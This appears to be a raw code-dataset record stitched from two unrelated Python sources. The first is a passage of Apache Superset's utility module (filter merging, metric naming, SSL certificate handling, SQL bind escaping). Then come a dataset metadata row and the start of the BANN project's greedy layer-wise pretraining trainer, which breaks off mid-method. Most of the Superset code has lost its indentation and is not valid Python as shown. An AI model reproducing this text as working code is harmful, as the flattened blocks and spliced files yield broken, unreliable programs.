raise ValueError(__("Unsupported clause type: %(clause)s", clause=clause))
result: AdhocFilterClause = {
"clause": clause.upper(),
"expressionType": "SQL",
"sqlExpression": form_data.get(clause),
}
result["filterOptionName"] = md5_sha_from_dict(cast(Dict[Any, Any], result))
return result
def merge_extra_form_data(form_data: Dict[str, Any]) -> None:
"""
Merge extra form data (appends and overrides) into the main payload
and add applied time extras to the payload.
"""
filter_keys = ["filters", "adhoc_filters"]
extra_form_data = form_data.pop("extra_form_data", {})
append_filters: List[QueryObjectFilterClause] = extra_form_data.get("filters", None)
# merge append extras
for key in [key for key in EXTRA_FORM_DATA_APPEND_KEYS if key not in filter_keys]:
        extra_value = extra_form_data.get(key, {})
        form_value = form_data.get(key, {})
        form_value.update(extra_value)
        if form_value:
            form_data[key] = form_value
# map regular extras that apply to form data properties
for src_key, target_key in EXTRA_FORM_DATA_OVERRIDE_REGULAR_MAPPINGS.items():
value = extra_form_data.get(src_key)
if value is not None:
form_data[target_key] = value
# map extras that apply to form data extra properties
extras = form_data.get("extras", {})
for key in EXTRA_FORM_DATA_OVERRIDE_EXTRA_KEYS:
value = extra_form_data.get(key)
if value is not None:
extras[key] = value
if extras:
form_data["extras"] = extras
adhoc_filters: List[AdhocFilterClause] = form_data.get("adhoc_filters", [])
form_data["adhoc_filters"] = adhoc_filters
append_adhoc_filters: List[AdhocFilterClause] = extra_form_data.get(
"adhoc_filters", []
)
adhoc_filters.extend(
{"isExtra": True, **fltr} for fltr in append_adhoc_filters # type: ignore
)
if append_filters:
adhoc_filters.extend(
simple_filter_to_adhoc({"isExtra": True, **fltr}) # type: ignore
for fltr in append_filters
if fltr
)
def merge_extra_filters(form_data: Dict[str, Any]) -> None:
# extra_filters are temporary/contextual filters (using the legacy constructs)
# that are external to the slice definition. We use those for dynamic
# interactive filters like the ones emitted by the "Filter Box" visualization.
# Note extra_filters only support simple filters.
applied_time_extras: Dict[str, str] = {}
form_data["applied_time_extras"] = applied_time_extras
adhoc_filters = form_data.get("adhoc_filters", [])
form_data["adhoc_filters"] = adhoc_filters
merge_extra_form_data(form_data)
if "extra_filters" in form_data:
        # __from and __to are special extra_filters that target time
# boundaries. The rest of extra_filters are simple
# [column_name in list_of_values]. `__` prefix is there to avoid
# potential conflicts with column that would be named `from` or `to`
date_options = {
"__time_range": "time_range",
"__time_col": "granularity_sqla",
"__time_grain": "time_grain_sqla",
"__time_origin": "druid_time_origin",
"__granularity": "granularity",
}
# Grab list of existing filters 'keyed' on the column and operator
def get_filter_key(f: Dict[str, Any]) -> str:
if "expressionType" in f:
return "{}__{}".format(f["subject"], f["operator"])
return "{}__{}".format(f["col"], f["op"])
existing_filters = {}
for existing in adhoc_filters:
if (
existing["expressionType"] == "SIMPLE"
and existing.get("comparator") is not None
and existing.get("subject") is not None
):
existing_filters[get_filter_key(existing)] = existing["comparator"]
for filtr in form_data[ # pylint: disable=too-many-nested-blocks
"extra_filters"
]:
filtr["isExtra"] = True
# Pull out time filters/options and merge into form data
filter_column = filtr["col"]
time_extra = date_options.get(filter_column)
if time_extra:
time_extra_value = filtr.get("val")
if time_extra_value and time_extra_value != NO_TIME_RANGE:
form_data[time_extra] = time_extra_value
applied_time_extras[filter_column] = time_extra_value
elif filtr["val"]:
# Merge column filters
filter_key = get_filter_key(filtr)
if filter_key in existing_filters:
# Check if the filter already exists
if isinstance(filtr["val"], list):
if isinstance(existing_filters[filter_key], list):
# Add filters for unequal lists
# order doesn't matter
if set(existing_filters[filter_key]) != set(filtr["val"]):
adhoc_filters.append(simple_filter_to_adhoc(filtr))
else:
adhoc_filters.append(simple_filter_to_adhoc(filtr))
else:
# Do not add filter if same value already exists
if filtr["val"] != existing_filters[filter_key]:
adhoc_filters.append(simple_filter_to_adhoc(filtr))
else:
# Filter not found, add it
adhoc_filters.append(simple_filter_to_adhoc(filtr))
# Remove extra filters from the form data since no longer needed
del form_data["extra_filters"]
def merge_request_params(form_data: Dict[str, Any], params: Dict[str, Any]) -> None:
"""
Merge request parameters to the key `url_params` in form_data. Only updates
    or appends parameters to `form_data` that are defined in `params`; pre-existing
parameters not defined in params are left unchanged.
:param form_data: object to be updated
:param params: request parameters received via query string
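    Example (illustrative):
    >>> form_data = {"url_params": {"foo": "bar"}}
    >>> merge_request_params(form_data, {"form_data": "{}", "foo": "baz"})
    >>> form_data["url_params"]
    {'foo': 'baz'}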
"""
url_params = form_data.get("url_params", {})
for key, value in params.items():
if key in ("form_data", "r"):
continue
url_params[key] = value
form_data["url_params"] = url_params
def user_label(user: User) -> Optional[str]:
"""Given a user ORM FAB object, returns a label"""
if user:
if user.first_name and user.last_name:
return user.first_name + " " + user.last_name
return user.username
return None
def get_or_create_db(
database_name: str, sqlalchemy_uri: str, always_create: Optional[bool] = True
) -> "Database":
# pylint: disable=import-outside-toplevel
from superset import db
from superset.models import core as models
database = (
db.session.query(models.Database).filter_by(database_name=database_name).first()
)
# databases with a fixed UUID
uuids = {
"examples": EXAMPLES_DB_UUID,
}
if not database and always_create:
logger.info("Creating database reference for %s", database_name)
database = models.Database(
database_name=database_name, uuid=uuids.get(database_name)
)
db.session.add(database)
if database:
database.set_sqlalchemy_uri(sqlalchemy_uri)
db.session.commit()
return database
def get_example_database() -> "Database":
db_uri = (
current_app.config.get("SQLALCHEMY_EXAMPLES_URI")
or current_app.config["SQLALCHEMY_DATABASE_URI"]
)
return get_or_create_db("examples", db_uri)
def get_main_database() -> "Database":
db_uri = current_app.config["SQLALCHEMY_DATABASE_URI"]
return get_or_create_db("main", db_uri)
def backend() -> str:
return get_example_database().backend
def is_adhoc_metric(metric: Metric) -> TypeGuard[AdhocMetric]:
return isinstance(metric, dict) and "expressionType" in metric
def get_metric_name(metric: Metric) -> str:
"""
Extract label from metric
:param metric: object to extract label from
:return: String representation of metric
:raises ValueError: if metric object is invalid
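    Example (illustrative):
    >>> get_metric_name("count")
    'count'
    >>> get_metric_name({"expressionType": "SIMPLE", "aggregate": "SUM",
    ...     "column": {"column_name": "num"}})
    'SUM(num)'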
"""
if is_adhoc_metric(metric):
label = metric.get("label")
if label:
return label
expression_type = metric.get("expressionType")
if expression_type == "SQL":
sql_expression = metric.get("sqlExpression")
if sql_expression:
return sql_expression
elif expression_type == "SIMPLE":
column: AdhocMetricColumn = metric.get("column") or {}
column_name = column.get("column_name")
aggregate = metric.get("aggregate")
if column and aggregate:
return f"{aggregate}({column_name})"
if column_name:
return column_name
raise ValueError(__("Invalid metric object"))
return metric # type: ignore
def get_metric_names(metrics: Sequence[Metric]) -> List[str]:
return [metric for metric in map(get_metric_name, metrics) if metric]
def get_first_metric_name(metrics: Sequence[Metric]) -> Optional[str]:
metric_labels = get_metric_names(metrics)
return metric_labels[0] if metric_labels else None
def ensure_path_exists(path: str) -> None:
try:
os.makedirs(path)
except OSError as ex:
if not (os.path.isdir(path) and ex.errno == errno.EEXIST):
raise
def convert_legacy_filters_into_adhoc( # pylint: disable=invalid-name
form_data: FormData,
) -> None:
mapping = {"having": "having_filters", "where": "filters"}
if not form_data.get("adhoc_filters"):
adhoc_filters: List[AdhocFilterClause] = []
form_data["adhoc_filters"] = adhoc_filters
for clause, filters in mapping.items():
if clause in form_data and form_data[clause] != "":
adhoc_filters.append(form_data_to_adhoc(form_data, clause))
if filters in form_data:
for filt in filter(lambda x: x is not None, form_data[filters]):
adhoc_filters.append(simple_filter_to_adhoc(filt, clause))
for key in ("filters", "having", "having_filters", "where"):
if key in form_data:
del form_data[key]
def split_adhoc_filters_into_base_filters( # pylint: disable=invalid-name
form_data: FormData,
) -> None:
"""
Mutates form data to restructure the adhoc filters in the form of the four base
filters, `where`, `having`, `filters`, and `having_filters` which represent
free form where sql, free form having sql, structured where clauses and structured
having clauses.
"""
adhoc_filters = form_data.get("adhoc_filters")
if isinstance(adhoc_filters, list):
simple_where_filters = []
simple_having_filters = []
sql_where_filters = []
sql_having_filters = []
for adhoc_filter in adhoc_filters:
expression_type = adhoc_filter.get("expressionType")
clause = adhoc_filter.get("clause")
if expression_type == "SIMPLE":
if clause == "WHERE":
simple_where_filters.append(
{
"col": adhoc_filter.get("subject"),
"op": adhoc_filter.get("operator"),
"val": adhoc_filter.get("comparator"),
}
)
elif clause == "HAVING":
simple_having_filters.append(
{
"col": adhoc_filter.get("subject"),
"op": adhoc_filter.get("operator"),
"val": adhoc_filter.get("comparator"),
}
)
elif expression_type == "SQL":
if clause == "WHERE":
sql_where_filters.append(adhoc_filter.get("sqlExpression"))
elif clause == "HAVING":
sql_having_filters.append(adhoc_filter.get("sqlExpression"))
form_data["where"] = " AND ".join(
["({})".format(sql) for sql in sql_where_filters]
)
form_data["having"] = " AND ".join(
["({})".format(sql) for sql in sql_having_filters]
)
form_data["having_filters"] = simple_having_filters
form_data["filters"] = simple_where_filters
def get_username() -> Optional[str]:
"""Get username if within the flask context, otherwise return noffin'"""
try:
return g.user.username
except Exception: # pylint: disable=broad-except
return None
def parse_ssl_cert(certificate: str) -> _Certificate:
"""
Parses the contents of a certificate and returns a valid certificate object
if valid.
:param certificate: Contents of certificate file
:return: Valid certificate instance
:raises CertificateException: If certificate is not valid/unparseable
"""
try:
return x509.load_pem_x509_certificate(
certificate.encode("utf-8"), default_backend()
)
except ValueError as ex:
raise CertificateException("Invalid certificate") from ex
def create_ssl_cert_file(certificate: str) -> str:
"""
This creates a certificate file that can be used to validate HTTPS
sessions. A certificate is only written to disk once; on subsequent calls,
only the path of the existing certificate is returned.
:param certificate: The contents of the certificate
:return: The path to the certificate file
:raises CertificateException: If certificate is not valid/unparseable
"""
filename = f"{md5_sha_from_str(certificate)}.crt"
cert_dir = current_app.config["SSL_CERT_PATH"]
path = cert_dir if cert_dir else tempfile.gettempdir()
path = os.path.join(path, filename)
if not os.path.exists(path):
# Validate certificate prior to persisting to temporary directory
parse_ssl_cert(certificate)
with open(path, "w") as cert_file:
cert_file.write(certificate)
return path
def time_function(
func: Callable[..., FlaskResponse], *args: Any, **kwargs: Any
) -> Tuple[float, Any]:
"""
Measures the amount of time a function takes to execute in ms
:param func: The function execution time to measure
:param args: args to be passed to the function
:param kwargs: kwargs to be passed to the function
:return: A tuple with the duration and response from the function
"""
start = default_timer()
response = func(*args, **kwargs)
stop = default_timer()
return (stop - start) * 1000.0, response
def MediumText() -> Variant: # pylint:disable=invalid-name
return Text().with_variant(MEDIUMTEXT(), "mysql")
def shortid() -> str:
return "{}".format(uuid.uuid4())[-12:]
class DatasourceName(NamedTuple):
table: str
schema: str
def get_stacktrace() -> Optional[str]:
if current_app.config["SHOW_STACKTRACE"]:
return traceback.format_exc()
return None
def split(
string: str, delimiter: str = " ", quote: str = '"', escaped_quote: str = r"\""
) -> Iterator[str]:
"""
A split function that is aware of quotes and parentheses.
:param string: string to split
:param delimiter: string defining where to split, usually a comma or space
:param quote: string, either a single or a double quote
:param escaped_quote: string representing an escaped quote
    :return: an iterator over the split substrings
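    Example (illustrative):
    >>> list(split("a b c"))
    ['a', 'b', 'c']
    >>> list(split('a (b c) d'))
    ['a', '(b c)', 'd']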
"""
parens = 0
quotes = False
i = 0
for j, character in enumerate(string):
complete = parens == 0 and not quotes
if complete and character == delimiter:
yield string[i:j]
i = j + len(delimiter)
elif character == "(":
parens += 1
elif character == ")":
parens -= 1
elif character == quote:
if quotes and string[j - len(escaped_quote) + 1 : j + 1] != escaped_quote:
quotes = False
elif not quotes:
quotes = True
yield string[i:]
def get_iterable(x: Any) -> List[Any]:
"""
Get an iterable (list) representation of the object.
:param x: The object
:returns: An iterable representation
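    Example (illustrative):
    >>> get_iterable(123)
    [123]
    >>> get_iterable([123])
    [123]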
"""
return x if isinstance(x, list) else [x]
def get_form_data_token(form_data: Dict[str, Any]) -> str:
"""
Return the token contained within form data or generate a new one.
:param form_data: chart form data
:return: original token if predefined, otherwise new uuid4 based token
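    Example (illustrative):
    >>> get_form_data_token({"token": "token_abc"})
    'token_abc'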
"""
return form_data.get("token") or "token_" + uuid.uuid4().hex[:8]
def get_column_name_from_metric(metric: Metric) -> Optional[str]:
"""
Extract the column that a metric is referencing. If the metric isn't
a simple metric, always returns `None`.
:param metric: Ad-hoc metric
:return: column name if simple metric, otherwise None
"""
if is_adhoc_metric(metric):
metric = cast(AdhocMetric, metric)
if metric["expressionType"] == AdhocMetricExpressionType.SIMPLE:
return cast(Dict[str, Any], metric["column"])["column_name"]
return None
def get_column_names_from_metrics(metrics: List[Metric]) -> List[str]:
"""
    Extract the columns referenced by a list of metrics. Excludes all
    SQL metrics.
    :param metrics: list of metrics (ad-hoc or predefined)
    :return: list of column names referenced by the simple (non-SQL) metrics
"""
return [col for col in map(get_column_name_from_metric, metrics) if col]
def extract_dataframe_dtypes(df: pd.DataFrame) -> List[GenericDataType]:
"""Serialize pandas/numpy dtypes to generic types"""
# omitting string types as those will be the default type
inferred_type_map: Dict[str, GenericDataType] = {
"floating": GenericDataType.NUMERIC,
"integer": GenericDataType.NUMERIC,
"mixed-integer-float": GenericDataType.NUMERIC,
"decimal": GenericDataType.NUMERIC,
"boolean": GenericDataType.BOOLEAN,
"datetime64": GenericDataType.TEMPORAL,
"datetime": GenericDataType.TEMPORAL,
"date": GenericDataType.TEMPORAL,
}
generic_types: List[GenericDataType] = []
for column in df.columns:
series = df[column]
inferred_type = infer_dtype(series)
generic_type = inferred_type_map.get(inferred_type, GenericDataType.STRING)
generic_types.append(generic_type)
return generic_types
def extract_column_dtype(col: "BaseColumn") -> GenericDataType:
if col.is_temporal:
return GenericDataType.TEMPORAL
if col.is_numeric:
return GenericDataType.NUMERIC
# TODO: add check for boolean data type when proper support is added
return GenericDataType.STRING
def indexed(
items: List[Any], key: Union[str, Callable[[Any], Any]]
) -> Dict[Any, List[Any]]:
"""Build an index for a list of objects"""
idx: Dict[Any, Any] = {}
for item in items:
key_ = getattr(item, key) if isinstance(key, str) else key(item)
idx.setdefault(key_, []).append(item)
return idx
def is_test() -> bool:
return strtobool(os.environ.get("SUPERSET_TESTENV", "false"))
def get_time_filter_status(
datasource: "BaseDatasource", applied_time_extras: Dict[str, str],
) -> Tuple[List[Dict[str, str]], List[Dict[str, str]]]:
temporal_columns = {col.column_name for col in datasource.columns if col.is_dttm}
applied: List[Dict[str, str]] = []
rejected: List[Dict[str, str]] = []
time_column = applied_time_extras.get(ExtraFiltersTimeColumnType.TIME_COL)
if time_column:
if time_column in temporal_columns:
applied.append({"column": ExtraFiltersTimeColumnType.TIME_COL})
else:
rejected.append(
{
"reason": ExtraFiltersReasonType.COL_NOT_IN_DATASOURCE,
"column": ExtraFiltersTimeColumnType.TIME_COL,
}
)
if ExtraFiltersTimeColumnType.TIME_GRAIN in applied_time_extras:
# are there any temporal columns to assign the time grain to?
if temporal_columns:
applied.append({"column": ExtraFiltersTimeColumnType.TIME_GRAIN})
else:
rejected.append(
{
"reason": ExtraFiltersReasonType.NO_TEMPORAL_COLUMN,
"column": ExtraFiltersTimeColumnType.TIME_GRAIN,
}
)
time_range = applied_time_extras.get(ExtraFiltersTimeColumnType.TIME_RANGE)
if time_range:
        # are there any temporal columns to apply the time range to?
if temporal_columns:
applied.append({"column": ExtraFiltersTimeColumnType.TIME_RANGE})
else:
rejected.append(
{
"reason": ExtraFiltersReasonType.NO_TEMPORAL_COLUMN,
"column": ExtraFiltersTimeColumnType.TIME_RANGE,
}
)
if ExtraFiltersTimeColumnType.TIME_ORIGIN in applied_time_extras:
if datasource.type == "druid":
applied.append({"column": ExtraFiltersTimeColumnType.TIME_ORIGIN})
else:
rejected.append(
{
"reason": ExtraFiltersReasonType.NOT_DRUID_DATASOURCE,
"column": ExtraFiltersTimeColumnType.TIME_ORIGIN,
}
)
if ExtraFiltersTimeColumnType.GRANULARITY in applied_time_extras:
if datasource.type == "druid":
applied.append({"column": ExtraFiltersTimeColumnType.GRANULARITY})
else:
rejected.append(
{
"reason": ExtraFiltersReasonType.NOT_DRUID_DATASOURCE,
"column": ExtraFiltersTimeColumnType.GRANULARITY,
}
)
return applied, rejected
def format_list(items: Sequence[str], sep: str = ", ", quote: str = '"') -> str:
quote_escaped = "\\" + quote
return sep.join(f"{quote}{x.replace(quote, quote_escaped)}{quote}" for x in items)
def find_duplicates(items: Iterable[InputType]) -> List[InputType]:
"""Find duplicate items in an iterable."""
return [item for item, count in collections.Counter(items).items() if count > 1]
def remove_duplicates(
items: Iterable[InputType], key: Optional[Callable[[InputType], Any]] = None
) -> List[InputType]:
"""Remove duplicate items in an iterable."""
if not key:
return list(dict.fromkeys(items).keys())
seen = set()
result = []
for item in items:
item_key = key(item)
if item_key not in seen:
seen.add(item_key)
result.append(item)
return result
def normalize_dttm_col(
df: pd.DataFrame,
timestamp_format: Optional[str],
offset: int,
time_shift: Optional[timedelta],
) -> None:
if DTTM_ALIAS not in df.columns:
return
if timestamp_format in ("epoch_s", "epoch_ms"):
dttm_col = df[DTTM_ALIAS]
if is_numeric_dtype(dttm_col):
# Column is formatted as a numeric value
unit = timestamp_format.replace("epoch_", "")
df[DTTM_ALIAS] = pd.to_datetime(
dttm_col, utc=False, unit=unit, origin="unix"
)
else:
# Column has already been formatted as a timestamp.
df[DTTM_ALIAS] = dttm_col.apply(pd.Timestamp)
else:
df[DTTM_ALIAS] = pd.to_datetime(
df[DTTM_ALIAS], utc=False, format=timestamp_format
)
if offset:
df[DTTM_ALIAS] += timedelta(hours=offset)
if time_shift is not None:
df[DTTM_ALIAS] += time_shift
def parse_boolean_string(bool_str: Optional[str]) -> bool:
"""
Convert a string representation of a true/false value into a boolean
>>> parse_boolean_string(None)
False
>>> parse_boolean_string('false')
False
>>> parse_boolean_string('true')
True
>>> parse_boolean_string('False')
False
>>> parse_boolean_string('True')
True
>>> parse_boolean_string('foo')
False
>>> parse_boolean_string('0')
False
>>> parse_boolean_string('1')
True
:param bool_str: string representation of a value that is assumed to be boolean
:return: parsed boolean value
"""
if bool_str is None:
return False
try:
return bool(strtobool(bool_str.lower()))
except ValueError:
return False
def apply_max_row_limit(limit: int, max_limit: Optional[int] = None,) -> int:
"""
Override row limit if max global limit is defined
:param limit: requested row limit
:param max_limit: Maximum allowed row limit
:return: Capped row limit
>>> apply_max_row_limit(100000, 10)
10
>>> apply_max_row_limit(10, 100000)
10
>>> apply_max_row_limit(0, 10000)
10000
"""
if max_limit is None:
max_limit = current_app.config["SQL_MAX_ROW"]
if limit != 0:
return min(max_limit, limit)
return max_limit
def escape_sqla_query_binds(sql: str) -> str:
"""
Replace strings in a query that SQLAlchemy would otherwise interpret as
bind parameters.
:param sql: unescaped query string
:return: escaped query string
>>> escape_sqla_query_binds("select ':foo'")
"select '\\\\:foo'"
>>> escape_sqla_query_binds("select 'foo'::TIMESTAMP")
"select 'foo'::TIMESTAMP"
>>> escape_sqla_query_binds("select ':foo :bar'::TIMESTAMP")
"select '\\\\:foo \\\\:bar'::TIMESTAMP"
>>> escape_sqla_query_binds("select ':foo :foo :bar'::TIMESTAMP")
"select '\\\\:foo \\\\:foo \\\\:bar'::TIMESTAMP"
"""
matches = BIND_PARAM_REGEX.finditer(sql)
processed_binds = set()
for match in matches:
bind = match.group(0)
if bind not in processed_binds:
sql = sql.replace(bind, bind.replace(":", "\\:"))
processed_binds.add(bind)
return sql
| 31.538546 | 88 | 0.636572 |
007a4dd7c930df4e631e6ced5310c2169b1a75f7
| 16,488 |
py
|
Python
|
bann/b_test_train_prepare/pytorch/p_train/glw_pretraining.py
|
arturOnRails/BANN
|
027af04349304941fb73c2ede502aca4b76f1ad1
|
[
"MIT"
] | null | null | null |
bann/b_test_train_prepare/pytorch/p_train/glw_pretraining.py
|
arturOnRails/BANN
|
027af04349304941fb73c2ede502aca4b76f1ad1
|
[
"MIT"
] | null | null | null |
bann/b_test_train_prepare/pytorch/p_train/glw_pretraining.py
|
arturOnRails/BANN
|
027af04349304941fb73c2ede502aca4b76f1ad1
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
""".. moduleauthor:: Artur Lissin"""
import math
import re
from copy import deepcopy
from dataclasses import dataclass
from typing import Optional, Tuple, Iterable, Callable, Dict, List, Pattern, Union, Final, final
import torch
from torch import nn
from torch.utils.data import Dataset, DataLoader
from bann.b_container.constants.file_names import TrainSubStrSuf
from bann.b_data_functions.pytorch.p_gen_fun import re_copy_model
from bann.b_frameworks.pytorch.interfaces.glw_pretraining_interface import \
GLWPNetInterface
from bann.b_container.functions.dict_str_repr import dict_string_repr
from bann.b_container.states.framework.interface.train_state import TrainState
from bann.b_test_train_prepare.pytorch.trainer_interface import TrainerInterfaceArgs, \
TrainerInterface
from bann.b_container.states.framework.pytorch.p_train.p_train_glw import GLWPTState
from bann.b_test_train_prepare.errors.custom_errors import KnownTrainerError
from bann.b_test_train_prepare.pytorch.p_train.functions.p_train_gen_fun import \
t_print_to_logger, PQueueTupleErg, PTrainEpochFunReturn, \
p_pre_train_epoch_gen, PPreTrainEpochFun, p_train_epoch_fun, SimpleSGDOptim
from bann.b_container.states.framework.pytorch.lr_scheduler_param import LrSchAlgWr
from bann.b_container.states.framework.pytorch.criterion_param import CriterionAlgWr
from bann.b_container.states.framework.pytorch.optim_param import OptimAlgWr
from pan.public.constants.train_net_stats_constants import TrainNNStatsElementType, \
TrainReturnFiller, TrainNNStatsElementFiller, TrainNNStatsElemInfo, \
create_train_net_stats_function
from rewowr.public.functions.syncout_dep_functions import logger_print_to_console
from rewowr.public.functions.worker_ctx import get_worker_ctx
from rewowr.public.interfaces.logger_interface import SyncStdoutInterface
_TRAIN_LOSS_STR: Final[str] = 'Train_Loss'
_EVAL_LOSS_STR: Final[str] = 'Eval_Loss'
_EVAL_TR_V_STR: Final[str] = 'Eval_Truth'
_TRAIN_TR_V_STR: Final[str] = 'Train_Truth'
_STR_LOSS_NUM: Final[Pattern[str]] = re.compile(r'(Eval_Loss|Train_Loss)_(\d+)')
_STR_TR_V_NUM: Final[Pattern[str]] = re.compile(r'(Eval_Truth)_(\d+)')
@final
@dataclass
class _TrainArgsCon:
batch_size: Tuple[int, ...]
shuffle: bool
input_train: Tuple[Dataset, ...]
input_eval: Tuple[Dataset, ...]
cuda: bool
drop_last: bool
num_workers: int
epoch_size: int
report_size: int
model: GLWPNetInterface
device: torch.device
@final
@dataclass
class _TrainWrArgs:
optimizer: Optional[OptimAlgWr]
scheduler: Optional[LrSchAlgWr]
criterion: Optional[CriterionAlgWr]
model: GLWPNetInterface
device: torch.device
truth_fun_id: str
train_ll: Tuple[str, Optional[int]]
test_ll: Tuple[str, Optional[int]]
end_criterion: float
batch_size: Tuple[int, ...]
shuffle: bool
input_train: Tuple[Dataset, ...]
input_eval: Tuple[Dataset, ...]
cuda: bool
drop_last: bool
num_workers: int
epoch_size: int
report_size: int
@final
@dataclass
class _ExtraData:
use_cuda: bool
model: nn.Module
tr_size: int
def _print_to_logger(sync_out: SyncStdoutInterface, trainer_stats: GLWPTState,
args_trainer: TrainerInterfaceArgs, extra_args: _ExtraData, /) -> None:
output_string = f"The arguments given to GLW-Pretrainer:\n"
output_string += f"Training on data with the size {extra_args.tr_size}\n"
output_string += f"The GLW-Pretrainer:"
output_string += f"\n\t{dict_string_repr(trainer_stats.get_kwargs().__dict__)}\n"
output_string += t_print_to_logger(args_trainer, extra_args.use_cuda, extra_args.model)
logger_print_to_console(sync_out, output_string)
_TrsT: Final = Callable[
[Tuple[DataLoader, ...], Tuple[DataLoader, ...], nn.Module, Tuple[int, int, int]],
PTrainEpochFunReturn
]
def _train_stack_fun(epoch_rep_layer: Tuple[int, int, int],
tt_loader: Tuple[Tuple[DataLoader, ...], Tuple[DataLoader, ...]],
stop_at_loss: float, layer_model: nn.Module, train_epoch: _TrsT, /) \
-> Iterable[Tuple[PQueueTupleErg, ...]]:
max_epoch, report_size, layer_cnt = epoch_rep_layer
epoch = 1
running_loss: float = float('inf')
report_cnt = 0
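    # Train in chunks of `report_size` epochs, yielding the collected stats after
    # each chunk; the loop stops early once the running loss falls below
    # stop_at_loss and at least two report chunks have completed.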
while epoch < max_epoch + 1:
int_max = int(epoch + report_size)
int_max = max_epoch + 1 if int_max > max_epoch + 1 else int_max
erg_loss: List[PTrainEpochFunReturn] = list(
p_pre_train_epoch_gen(tt_loader, (epoch, int_max, layer_cnt), layer_model, train_epoch)
)
if erg_loss and not math.isnan(erg_loss[-1].running_loss):
running_loss = erg_loss[-1].running_loss
last_run = int_max >= max_epoch + 1 or (
0 < running_loss < stop_at_loss and report_cnt >= 2
)
yield (
PQueueTupleErg(
f"{_TRAIN_LOSS_STR}_{layer_cnt}", epoch, [
elem.test_train.test_loss
if not (math.isnan(elem.test_train.test_loss)
or math.isinf(elem.test_train.test_loss))
else -1.0
for elem in erg_loss
], last_run
),
PQueueTupleErg(
f"{_EVAL_LOSS_STR}_{layer_cnt}", epoch, [
elem.test_eval.test_loss
if not (math.isnan(elem.test_eval.test_loss)
or math.isinf(elem.test_eval.test_loss))
else -1.0
for elem in erg_loss
], last_run
),
PQueueTupleErg(
f"{_TRAIN_TR_V_STR}_{layer_cnt}", epoch,
[elem.test_train.truth_v for elem in erg_loss], last_run
),
PQueueTupleErg(
f"{_EVAL_TR_V_STR}_{layer_cnt}", epoch,
[elem.test_eval.truth_v for elem in erg_loss], last_run
)
)
epoch = int_max
if 0 < running_loss < stop_at_loss and report_cnt >= 2:
epoch = max_epoch + 1
report_cnt += 1
def _train_fun(stop_at_loss: float, args_cont: _TrainArgsCon, train_epoch: _TrsT, /) \
-> Iterable[Tuple[PQueueTupleErg, ...]]:
train_loader = tuple(DataLoader(
tr_in[1],
batch_size=args_cont.batch_size[tr_in[0] % len(args_cont.batch_size)],
shuffle=args_cont.shuffle,
pin_memory=args_cont.cuda,
num_workers=args_cont.num_workers,
drop_last=args_cont.drop_last
) for tr_in in enumerate(args_cont.input_train))
test_loader = tuple(DataLoader(
te_in[1],
batch_size=args_cont.batch_size[te_in[0] % len(args_cont.batch_size)],
shuffle=False,
pin_memory=args_cont.cuda,
num_workers=args_cont.num_workers,
drop_last=False
) for te_in in enumerate(args_cont.input_eval))
if args_cont.num_workers > 0:
for train_test in [test_loader, train_loader]:
for tr_te_el in train_test:
tr_te_el.multiprocessing_context = get_worker_ctx()
max_epoch = args_cont.epoch_size if args_cont.epoch_size > 4 else 4
report_size = args_cont.report_size
report_size = int(max_epoch / 2) if report_size >= int(max_epoch / 2) else report_size
layer_model: nn.Module
for layer_cnt, layer_model in enumerate(args_cont.model.get_stack()):
model = layer_model.to(args_cont.device)
yield from _train_stack_fun(
(max_epoch, report_size, layer_cnt), (train_loader, test_loader),
stop_at_loss, model, train_epoch
)
re_copy_model(model.state_dict(), layer_model)
def _train_wrapper(wr_container: _TrainWrArgs, /) -> Iterable[Tuple[PQueueTupleErg, ...]]:
if wr_container.criterion is None:
criterion = nn.CrossEntropyLoss()
else:
criterion = wr_container.criterion.criterion
if wr_container.optimizer is None:
optimizer: Union[OptimAlgWr, SimpleSGDOptim] \
= SimpleSGDOptim(wr_container.model.get_stack_first)
else:
optimizer = wr_container.optimizer
def train_epoch(data_loader_train: Tuple[DataLoader, ...],
data_loader_test: Tuple[DataLoader, ...],
model: nn.Module, epoch_layer_batch: Tuple[int, int, int]) \
-> PTrainEpochFunReturn:
return p_train_epoch_fun(PPreTrainEpochFun(
data_loader_train=data_loader_train, data_loader_test=data_loader_test,
epoch=epoch_layer_batch[0], max_batch_cnt=epoch_layer_batch[2],
model=model, device=wr_container.device,
optimizer=optimizer,
criterion=criterion, scheduler_wrapper=wr_container.scheduler,
truth_fun_id=wr_container.truth_fun_id,
train_ll=wr_container.train_ll,
test_ll=wr_container.test_ll,
complete_model=wr_container.model,
layer_cnt=epoch_layer_batch[1],
shuffle=wr_container.shuffle
))
yield from _train_fun(wr_container.end_criterion, _TrainArgsCon(
batch_size=wr_container.batch_size, shuffle=wr_container.shuffle,
input_train=wr_container.input_train, input_eval=wr_container.input_eval,
cuda=wr_container.cuda, drop_last=wr_container.drop_last,
num_workers=wr_container.num_workers, epoch_size=wr_container.epoch_size,
report_size=wr_container.report_size, device=wr_container.device,
model=wr_container.model
), train_epoch)
@final
class GLWPreTrainer(TrainerInterface):
def __init__(self) -> None:
super().__init__()
self.__fitness: Optional[Tuple[float, float]] = None
self.__train_state: Optional[GLWPTState] = None
self.__log = True
self.__state_dict: Optional[Dict] = None
@property
def tr_state_dict(self) -> Dict:
if self.__state_dict is None:
raise KnownTrainerError("Training was not finished")
return self.__state_dict
def deactivate_log(self) -> None:
self.__log = False
@property
def train_state(self) -> GLWPTState:
if self.__train_state is None or not isinstance(self.__train_state, GLWPTState):
raise KnownTrainerError("Train state was not set properly!")
return self.__train_state
def set_train_state(self, state: TrainState, /) -> None:
if not isinstance(state, GLWPTState):
raise KnownTrainerError(
f"Expected type {GLWPTState.__name__} got {type(state).__name__}"
)
self.__train_state = state
@property
def fitness(self) -> Tuple[float, float]:
if self.__fitness is None:
raise KnownTrainerError("The Trainer was not started!")
return self.__fitness
def _set_fitness(self, eval_loss: float, train_loss: float, eval_truth: float, /) -> None:
eval_truth_local = -1.0
eval_loss_local = float('inf')
if not math.isnan(eval_truth) and 0 <= eval_truth < float('inf'):
eval_truth_local = eval_truth
if not math.isnan(eval_loss) and 0 < eval_loss < float('inf'):
if not math.isnan(train_loss) and 0 < train_loss < float('inf'):
eval_loss_local = eval_loss + abs(eval_loss - train_loss) \
* self.train_state.get_kwargs().over_fit
elif self.train_state.get_kwargs().over_fit == 0:
eval_loss_local = eval_loss
self.__fitness = (eval_loss_local, eval_truth_local)
def train(self, sync_out: SyncStdoutInterface,
args: TrainerInterfaceArgs, /) -> Iterable[TrainNNStatsElementType]:
self.__state_dict = None
if not (args.input_train and args.input_eval):
raise KnownTrainerError("Received empty dataset!")
if self.train_state.get_kwargs().torch_thread:
